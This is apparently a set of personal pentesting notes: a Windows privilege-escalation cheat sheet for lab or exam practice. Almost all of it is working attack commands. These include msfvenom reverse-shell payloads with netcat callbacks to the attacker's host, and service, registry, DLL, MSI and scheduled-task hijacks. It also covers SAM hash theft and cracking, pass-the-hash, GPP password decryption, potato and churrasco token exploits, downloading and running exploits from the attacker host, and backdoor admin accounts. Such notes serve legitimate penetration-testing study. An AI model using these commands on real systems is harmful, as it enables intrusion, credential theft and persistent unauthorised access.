Priority
Kernel and privesc links
LOLBas
Living off the Lands binary (Windows) - Like GTFOBins
General:
Goals: Get shell as 'Administrator' or 'System'
All PrivEsc are actually access-control-violations
AC and User Perms are intrinsically linked
Think of how Windows handles perms
Strategy:
Dont chase your first finding
Look over the enumeration
Exploitable service that can be edited ..but cant be stop/started.. isnt very good for us
Take a look around for interesting files
Look for easy-steps first:
Get versions and search exploit
No admin?
Dont panic. Keep practicing.
Go back through yours enum results
PrivEsc Class
Perms
User Accounts
files/folders/desktop/etc
Service Accounts
SYSTEM is highest priv of any local acct
Also: network service, local service
Perms are controlled by ACL
user/group/svc/registry/etc
Misconfigs
Insecure Service Properties
Weak Registry Permissions
Insecure Service Executables
Best Practices:
Use 'allowed commands' (ie: whitelist) instead of 'disallowed'
Use a pager like 'most' instead of less/more
Avoid allowing programming languages
or harden, pty(), system(), exec()
smbserver.py
Send files between Linux and Windows
Copy locate smbserver.py
cd /usr/share/doc/python3-impacket/examples/
sudo python3 ./smbserver.py share /tmp Unquoted Paths
Copy C:\Program Files\OpenVPN\openvpn.exe ..bad
"C:\Program Files\VMWare\vmtoolsd.exe" ..good
C:\Program.exe ..Could run with elevated!! Passwords: Unattended Install Files
Copy Unattend.xml
C:\Windows\System32\
C:\Windows\System32\sysprep\
C:\Windows\Panther\
C:\Windows\Panther\Unattend\
Found:
<LocalAccount>
<Value> U0VDNTk5IFJPQKET== <Value> ..base64 !!!
echo U0VDNTk5IFJPQKET== | base64 -d
Flag!! Passwords: Group Policy Prefs (GPP)
We used to set the 'default' admin password
Old and patched but still has traces
Copy > findstr /S cpassword %LOGONSERVER%\sysvol\*.xml Metasploit:
Copy MSF > GPP module to pull/extract/decrypt Domain:
Copy Map the Domain controller SYSVOL share
> net use z: \\dc01\SYSVOL
Find the GPP file: Groups.xml
> cd z:
> dir /s Groups.xml
Review the contents for passwords
> type Groups.xml gpp-decrypt
Copy gpp-decrypt riBZpPtHOGtVk+SdLOmJ6xiNgFH6Gp45BoP3I6AnPgZ1IfxtgI67qqZfgh78kBZB Enable SMB v1
v1 is a really bad idea.. EternalBlue exploitable!
Copy Powershell as Admin:
PS> Enable-WindowsOptionalFeature -Online -featureName "SMB1Protocol-Client" -All
or
PS> Get-WindowsOptionalFeature -Online -featureName "SMB1Protocol"
PS> Enable-WindowsOptionalFeature -Online -featureName "SMB1Protocol-Client" -All
Yes, reboot or
PS> optionalfeatures.exe
.. SMB 1.0
.. SMB Direct
Ok Basic Venom Reverse Shell:
Copy msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=53 -f exe -o reverse.exe
nc -nvlp 53
c:\PrivEsc> copy \192.x.kali\tools\reverse.exe .
c:\PrivEsc> .\reverse.exe
RDP Trick
Copy > net user
> net user mikes hacks /add
> net localgroup administrators mikes /add
Allow Remote Access:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Kali:
> sudo apt-get update
> sudo apt-get install rdesktop
> rdesktop -u mike -p hacks legacy psexec
Escalate from admin to SYSTEM
https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
From Kali:
Make Windows connect-back
Copy > PsExec64.exe -accepteula -i -s C:\PrivEsc\reverse.exe
> PSExec64.exe -accepteula -i -u "nt authority\local service" reverse.exe
> psexec64 \\COMPUTERNAME -u Test -p test -h "c:\users\public\nc.exe -nc 10.x.x.x 4444 -e cmd.exe" Kernel Exploits from Sysinfo
Method: systeminfo > wes > cve > shell
Copy cd C:\Temp
systeminfo > sys.txt
C:> systeminfo > \\192.x.x.x\share\sys.txt
curl -k "https://raw.githubusercontent.com/bitsadmin/wesng/master/wes.py" > ./wes.py
python wes.py /share/systeminfo.txt -i 'Elevation of Privilege' --exploits-only | more
python wes.py ./sys.txt -s critical -i "Remote Code Execution"
Look up results:
CVE or MS found: CVE-2018-8120
Including compiled binary: x64.exe x86.exe
PrivEsc:
Kali: listener: nc -nvlp 53
Windows: Run the exploit, and the program to execute (ie: rev shell)
c:\PrivEsc\cve-2018-8120-x64.exe C:\PrivEsc\reverse.exe
Services
We can exploit.. If they are running with SYSTEM privs and are misconfigured
Copy sc.exe qc myserv ..query config
sc.exe query myserv ..query status
sc.exe config myserv option=xyz ..modify
net start/stop myserv ..start/stop Service: Modify
You could repoint the executable to our Reverse-Shell
Must be able to stop/start the service to apply
Maybe force a reboot, if you have to
Copy ---------------------------
Service Issues:
./winPEASany.exe quiet servicesinfo
cat winpeas-services.txt
Found:
daclsvc - "you can modify this service"
Verify:
accesschk.exe /accepteula -uwcqv user daclsvc
Found: SERVICE_CHANGE_CONFIG, SERVICE_START, SERVICE_STOP
sc qc daclsvc ..svc path & detail
sc query daclsvc ..currently stopped
---------------------------
Exploit:
Change binpath to our reverse-shell
sc config daclsvc binpath="\"C:\PrivEsc\reverse.exe\""
kali: nc -nvlp 53
net start daclsvc
whoami system!! Service: Unquoted Path
Unquoted paths can give ambiguity
whoami.exe ..same as: whoami
Example:
C:\Program Files\Some Dir\SomeProgram.exe
Could be:
"C:\Program" with "Files\Some" as argument
Windows will do a check to test options when run.
Copy ---------------------------
winPEAS
Found: Unquotedsvc
C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
Verify we can edit:
accesschk.exe /accepteula -uwcqv user unquotedsvc
Found: SERVICE_START, SERVICE_STOP
Can we edit the Binary?
accesschk.exe /accepteula -uwcqv C:
accesschk.exe /accepteula -uwcqv "C:\Program Files\"
accesschk.exe /accepteula -uwcqv "C:\Program Files\Unquoted Path Service\"
Found!
BUILTIN\Users ..allowed RW
C:\Program Files\Unquoted Path Service\
---------------------------
Exploit:
C:\Program Files\Unquoted Path Service\Common.exe
copy reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
kali listener: nc -nvlp 53
net start unquotedsvc
whoami system!! Service: Exec Swap
If "myservice.exe" is modifiable, we can just replace it!
Be sure to make a backup, in prod
Copy ---------------------------
winPEAS
filepermsvc .."File Permissions: Everyone [AllAccess]"
Verify:
.\accesschk.exe /accepteula -uvwqk "C:\Program Files\File Permissions Service\filepermservice.exe"
.\accesschk.exe /accepteula -uvqc filepermsvc
Found:
Can read/write
Can start/stop
Backup
copy "C:\Program Files\File Permissions Service\filepermservice.exe" C:\Temp
---------------------------
Exploit:
copy /Y C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe"
kali listener: nc -nvlp 53
net start filepermsvc
whoami system!! Registry: Weak Perms
Registry keeps detail for each service.
ACL is bad = we can edit the registry.
Even if the service cant be modified.
We can update the registry of a service that has 'system' and point to our reverse
Copy ---------------------------
winPEAS
Found 'regsvc' can be modified in registry
Verify:
powershell -exec bypass
ps> Get-Acl HKLM:\System\CurrentControlSet\Services\regsvc | Format-List
ps> .\accesschk.exe /accepteula -uvwqk HKLM:\System\CurrentControlSet\Services\regsvc
Confirmed:
RW - NT Authority\INTERACTIVE ..meaning us!
Can we start the service?
ps> .\accesschk.exe /accepteula -ucqv user regsvc
SERVICE_START, SERVICE_STOP ..yes!
---------------------------
Plan:
Repoint the Registry to our 'reverse':
reg query HKLM:\System\CurrentControlSet\Services\regsvc
.. ImagePath says: C:\Program Files... insecureregistryservice.exe
.. ObjectName: LocalSystem ..SYSTEM privs
---------------------------
Exploit:
reg add HKLM:\System\CurrentControlSet\Services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
kali listener: nc -nvlp 53
net start regsvc
whoami system!!
Registry: AutoRuns
Could be useful, but difficult
Since it would require a reboot
winPEASany.exe quiet appliationinfo
Autorun Applications ..Found!
C:\Program Files Autorun Program\program.exe
FilePerms: Everyone ..yikes
Manually check for AutoRuns:
reg query HKLM\SOFWARE\Microsoft\Windows\CurrentVersion\Run
found!
Verify, can we write to it?
accesschk.exe /accepteula -wvu "C:\Program Files Autorun Program\program.exe"
RW Everyone ALL_ACCESS
Backup the .exe copy "C:\Program Files Autorun Program\program.exe" C:\Temp
Overwrite the .exe
copy /Y reverse.exe "C:\Program Files Autorun Program\program.exe"
kali listener: nc -nvlp 53
On a restart, Windows will auto-run as the 'last-user'
So, lets get admin prepped and reboot:
windows: login as admin windows: restart
whoami admin!
DLL Missing Hijack
The DLL will get same permission as executed
If DLL is missing, and we can write to that dir...
Then we can add our evil-dll in that location!
Often a very MANUAL process to discover this exploit
In a real engagement: we would copy the .exe and analyze it in another environment
Copy ---------------------------
winPEAS
Check for DLL Hijacking in PATH folders
"C:\Temp" ..found writable and Path!
"dllsvc" ..vulnerable to hijacking
Verify:
.\accesschk.exe /accepteula -uvqc dllsvc
Found: Can start/stop
sc qc dllsvc
binary: "C:\Program Files\DLL Hijack Service\dllhijackservice.exe"
runs as LocalSystm
---------------------------
Procmon DLL Watch
Windows:
Procmon64 (run as Admin)
Clear, Ctrl-L ..add filter Process "dllhijackservice.exe"
De-select registry
De-select show-network
Start Capture
cmd> net start dllsvc
lots of 'NAME NOT FOUND'
Also tries: "C:\Temp\hijackme.dll" ..which is writeable!
---------------------------
Exploit:
msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=53 -f dll -o /tools/hijackme.dll
nc -nvlp 53
copy \\192.x.kali\tools\hijackme.dll C:\Temp
net stop dllsvc
net start dllsvc
whoami
system!! MSI: Install Elevated
AlwaysInstallElevated Windows will allow installers to run w/elevated
Lets make a malicious MSI file that contains reverse-shell
Catch: Only works if 2 registry values are set:
HKLM \SOFTWARE\Policies\Microsoft\Windows\Installer
HKCU \SOFTWARE\Policies\Microsoft\Windows\Installer
Copy ---------------------------
winPEASany.exe quiet windowscreds
Found:
AlwaysInstallElevated set to 1 in HKLM
AlwaysInstallElevated set to 1 in HKCU
Verify:
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
.. AlwaysInstallElevated = 1
.. Found!
---------------------------
Exploit: msi
msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=53 -f msi -o /tools/reverse.msi
Catch with netcat or msf/multi
nc -nvlp 53
copy & Execute:
> copy \\192.x.kali\tools\reverse.msi C:\Temp
> msiexec /quiet/qn /i reverse.msi
whoami
system!! Passwords: Registry
Reused, Readable, or Insecure
Registry: Apps or Windows may store plaintext
Copy Search Registry
For passwords but too many results
> reg query HKLM /f password /t REG_SZ /s
> reg query HKCU /f password /t REG_SZ /s
Enum:
> winPEASany.exe quiet filesinfo userinfo
Autologon user/pass ..Found!
Putty Sessions u/pw ..Found
Verify Reg:
> reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
> reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s
user/pass Found!!
Kali:
> winexe -U 'admin%password123' //192.168.win cmd.exe
whoami admin!!
> winexe -U 'admin%password123' --system //192.168.win cmd.exe
whoami system!! Passwords: stored creds: runas
Copy > winPEASany.exe quiet cmd windowscreds
Stored Credentials - User: MyPc\admin ..Found
Confirm:
> cmdkey /list
Exploit:
> runas /savecred /user:admin C:\PrivEsc\reverse.exe
nc -nvlp 53
whoami
admin Passwords: Search Configs
To help install a pc, but passwords often left behind
Copy ---------------------------
Manual search:
recursive from current dir:
> dir /s *pass* == *.config
> findstr /si password *.xml *.ini *.txt
Try:
c:\user\home
c:\temp
c:\someapp\
---------------------------
Enumerate:
> winPEASany.exe quiet cmd searchfast filesinfo
Known files that can contain creds ..Found!
C:\Windows\Microsoft.NET\Framework...\web.config
C:\Windows\Panther\Unattend.xml
> type C:\Windows\Panther\Unattend.xml
found: user:pass (base64)
kali
echo "mybasexyz" | base64 -d Passwords: SAM
SAM - holds windows password hashes
SYSTEM - encrypted hash key
Locked while Windows is running
If you can read both, then you can extract
Located:
C:\Windows\System32\config
Backups:
C:\Windows\Repair
C:\Windows\System32\config\RegBack
Copy winPEAS
> winPEASany.exe quiet cmd searchfast filesinfo
Found SAM and REGISTRY in:
C:\Windows\Repair
Copy back to Kali:
> copy C:\Windows\Repair\SAM \\192.x.kali\tools\
> copy C:\Windows\Repair\SYSTEM \\192.x.kali\tools\ pwdump
Crack Windows PW using SAM/SYSTEM
Copy git clone https://github.com/Neohapsis/creddump7.git
cd creddump7
> python2 pydump.py /tools/SYSTEM /tools/SAM
crack admin
hashcat -m 1000 --force myhashxyz123 /usr/share/wordlist/rockyou.txt password123 ..Found!
Connect from Kali:
winexe -U 'admin%password123' --system //192.168.win cmd.exe
whoami admin Pass the Hash
Use hash instead of the PW
Copy > pth-winexe -U 'admin%myhashxyz123:secondhalf' //192.x.win cmd.exe
whoami admin!!
> pth-winexe --system -U 'admin%myhashxyz123:secondhalf' //192.x.win cmd.exe
whoami system!! Scheduled Tasks
If we can edit a current Scheduled Task
We can append our evil entry
Copy ---------------------------
View:
> schtasks /query /fo LIST /v
ps> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
cd C:\
cd DevTools ..interesting folder
CleanUp.ps1 ..interesting file
type CleanUp.ps1
Note says
#Runs every minute
#Runs as System
Remove-Item C:\DevTools\*.log
---------------------------
perms:
accesschk.exe /accepteula -quv user CleanUp.ps1
File_Write
backup:
copy CleanUp.ps1 C:\Temp\
---------------------------
Exploit:
echo C:\PrivEsc\reverse.exe >> CleanUp.ps1
nc -nvlp 53
Connected
whoami
system!! GUI Admin Apps
Since we also use this to Citrix Escaping
If an app is setup to run as Admin
You can use it to also do other things! - Like open a CMD!
Copy Open:
"AdminPaint" icon
View:
tasklist /V | findstr mspaint.exe
mspaint.exe ..with Admin.. Running
Exploit:
AdminPaint > File > Open >
file://c:/windows/system32/cmd.exe
whoami:admin Startup Apps
If we can edit, we can add:
C:\ProgramData\Microsofot\Windows\Start Menu\Programs\StartUp
When Admin logs in - it will execute as Admin !!
Copy Kali-reversed:
> accesschk.exe /accepteula -d "C:\ProgramData\Microsofot\Windows\Start Menu\Programs\StartUp"
Users have RW
vbscript to create a link to our reverse.exe
> type CreateShortcut.vbs
> cscript CreateShortcut ..creates our reverse.lnk
kali:
nc -nvlp 53
Win:
Logout of Windows
Login as Admin.. to trigger our Startup Script
Kali: Connected
whoami
admin!! Installed Apps
Filter: local, windows search: priv esc
Examples:
KioWare Server.. based on weak privs
IObiot .. unquoted service path
IperiusBackup .. file permissions
Hot Potato
Spoofing attack, with NTLM, to get SYSTEM
Works : Windows 7, 8, early 10
Intercepts requests, Spoofs, runs our Payload
Copy > potato.exe -ip 192.x ..win-targer
-cmd "C:\PrivEsc\reverse.exe" ..payload
-enable_httpserver true
-enable_defender true
-enable_spoof true
-enable_exhausust true
> kali: nc -nvlp 53
whoami system! Potato
Another version of 'hot potato' ?
Windows 7,8,10, Server 2008, Server 2012
Potato Family
PrintSpoofer
Print Spooler Exploit
https://github.com/itm4n/PrintSpoofer
Requires: vc_redist.x64.exe (if not present)
Copy > PSExec64.exe /accepteula -i -u "nt authority\local service" C:\PrivEsc\reverse.exe
> whoami
local service
> whoami /priv
SeImpersonatePrivilege ..Enabled
> PrintSpoofer.exe -i -c "C:\PrivEsc\reverse.exe"
> nc -nvlp 4444
> whoami
system Metasploit: Looking Around
Copy mtp > run post/windows/gather/win_privs cd\ & dir /b /s proof.txt type c:\pathto\proof.txt
getsystem
Metasploit Meterpreter - genius!
Wont work on patched newer-windows-boxes
Should NOT be considered for user>admin escalation method in modern systems
rapid7/metasploit-payloads
3 techniques getsystem can use
Will try all 3 till success
Named Pipe Impersonation impersonates access token to get SYSTEM
Named Pip Impersonation but uses DLL to disk as SYSTEM DLL connects to named pipe limited to x86 arch
Token Duplication requires SeDebugPrivilege finds service as SYSTEM and injects DLL in Memory
churrasco
Token impersonation via churrasco
To escalate privs to System - developed by Cesar Cerrudo.
Server 2003 allows Network Service and Local Service to impersonate 'System'
Patched by Microsoft in Windows 2012 (MS09-12).
On newer systems Juicy Potato works fine.
But on older systems, token impersonation is abused via the churrasco exploit.
If you have access to a box as nt authority\network service
IE: You managed to upload ASP.NET shell
You can easily elevate your privileges on the box.
You can download the exploit here
or you can use the one from sqlninja which is located at /usr/share/sqlninja/apps/churrasco.exe
It’s used by sqlninja in cases when we bruteforced sa password.
After uploading you can easily
Copy ------------------------
Share from Kali/smb:
locate churrasco.exe
wget https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
cp /usr/share/sqlninja/apps/churrasco.exe /tmp
cp /usr/share/sqlninja/apps/nc.exe /tmp
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.98 RPORT=5555 -f exe > /tmp/venomshell.exe
locate smbserver.py
cd /usr/share/doc/python3-impacket/examples/
sudo python3 smbserver.py share /tmp
nc -nvlp 5555
------------------------
Windows:
whoami /priv ..SeImpersonatePrivilege - Yes!
systeminfo ..Server 2003 - Yes!
cd C:\Windows\Temp
copy \\10.x.x.x\share\nc.exe .
copy \\10.x.x.x\share\venomshell.exe .
copy \\10.x.x.x\share\churrasco.exe .
> \\10.x.x.x\share\churrasco.exe -d whoami
> churrasco -d "net user /add <username> <password>"
> churrasco -d "net localgroup administrators <username> /add"
> churrasco -d "net localgroup "Remote Desktop Users" <username> /add"
> churrasco.bin "net user oscp oscp /add && net localgroup Administrators oscp /add"
> churrasco -d "'reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server' /v fDenyTSConnections /t REG_DWORD /d 0 /f"
linux> rdesktop -u oscp -p oscp 10.x.x.x
> churrasco.exe -d venomshell.exe
> churrasco.exe -d "C:\Windows\Temp\nc.exe 10.x.x.x 5555 -e cmd.exe"
> \\10.x.x.x\share\churrasco.exe -d "C:\Windows\Temp\nc.exe 10.x.x.x 5555 -e cmd.exe" chimichurri
Copy cd /opt
git clone https://github.com/egre55/windows-kernel-exploits
cd windows-kernel-exploits/MS10–059: Chimichurri/Compiled
cp Chimichurri.exe .
pythom -m SimpleHTTPServer 4444
cd C:\ColdFusion8\ or:
cd C:\Windows\Temp
echo $webclient = New-Object System.Net.WebClient >wget.ps1
echo $url = "http://$MyIP:4444/Chimichurri.exe" >>wget.ps1
echo $file = "Chimichurri.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInterative -NoProfile -File wget.ps1
Chimichurri.exe 10.10.14.xx 5555
nc -nvlp 5555
connected ..system!!
----------
or:
cd /usr/share/doc/python3-impacket/examples
sudo python3 ./smbserver.py share /tmp
nc -nvlp 5555
cd C:\Windows\Temp\
copy \\$MyIP\share\Chimichurri.exe .
Chimichurri.exe $MyIP 5555
system!!
Python to Exe
Windows privledge escalation exploits are often written in Python.
You can compile the using "pyinstaller.py" into an executable
Copy > pip install pyinstaller
> wget -O exploit.py http://www.exploit-db.com/download/31853
> python pyinstaller.py --onefile exploit.py
exploit.exe
----------------------------------------
Windows Server 2003 and IIS 6.0 privledge escalation using impersonation:
https://www.exploit-db.com/exploits/6705/
----------------------------------------
> wget -O ms11-080.py http://www.exploit-db.com/exploits/18176/
> python pyinstaller.py --onefile ms11-080.py
mx11-080.exe Powershell Exploits
You may find that some Windows privledge escalation exploits are written in Powershell. You may not have an interactive shell that allows you to enter the powershell prompt. Once the powershell script is uploaded to the server
Powershell Priv Escalation Tools:
One liner to run a powershell command from a basic (cmd.exe) shell:
Copy MS16-032
https://www.exploit-db.com/exploits/39719/
> powershell -ExecutionPolicy ByPass -command "& { . C:\Users\Public\Invoke-MS16-032.ps1; Invoke-MS16-032 }" Powershell RunAs
PowerShell can also be used to launch a process as another user.
Simple script will run a reverse shell as the specified username and password.
Copy $username = '<username here>'
$password = '<password here>'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Process -FilePath C:\Users\Public\nc.exe -NoNewWindow -Credential $credential -ArgumentList ("-nc","10.x.x.x","4444","-e","cmd.exe") -WorkingDirectory C:\Users\Public
> powershell -ExecutionPolicy ByPass -command "& { . C:\Users\public\PowerShellRunAs.ps1; }" useradd.exe
Copy root@kali:~# cat useradd.c
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
int main ()
{
int i;
i=system ("net localgroup administrators bob /add");
return 0;
}
Compile:
i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c 